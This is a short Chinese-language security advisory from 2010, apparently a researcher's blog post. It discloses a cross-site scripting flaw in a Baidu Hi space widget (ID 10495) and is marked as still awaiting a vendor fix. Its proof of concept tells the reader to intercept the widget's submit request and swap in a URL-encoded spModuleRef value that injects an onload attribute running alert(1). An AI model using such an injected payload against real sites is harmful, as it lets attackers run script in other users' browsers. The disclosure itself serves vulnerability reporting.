hi.baidu widget(10495) xss Bug

Author: hi_heige
Blog: http://hi.baidu.com/hi_heige
Team: http://www.80vul.com
date: 2010年6月25日

一 综述
百度模块分享平台(http://act.hi.baidu.com/widget)是百度于2008年8月发布的,借此平台,用户可以方便地升级扩展空间的功能,用户之间还可以将自己制作的模块与别人共享,
经过测试发现模块"plurk空间插件"即:http://act.hi.baidu.com/widget/info/10495存在xss漏洞,当攻击者应用该模块,可导致在hi.baidu插入恶意的js/html代码。

二 PoC

应用模块:
http://act.hi.baidu.com/widget/info/10495

抓’提交’的http包

替换http包:

spModuleRef=%7B%22width%22%3A%22200%22%2C%22height%22%3A%22375%22%2C%22url%22%3A%22http%3A%2F%2Fwww%2Eplurk%2Ecom%2FgetWidget%3F%2522%2520onload%253Dalert%25281%2529%252F%252F%22%2C%22tip0%2E1%22%3A%22false%22%7D

重新提交修改后的http包。

三 补丁[fix]

等待官方补丁

发表评论?

0 条评论。

发表评论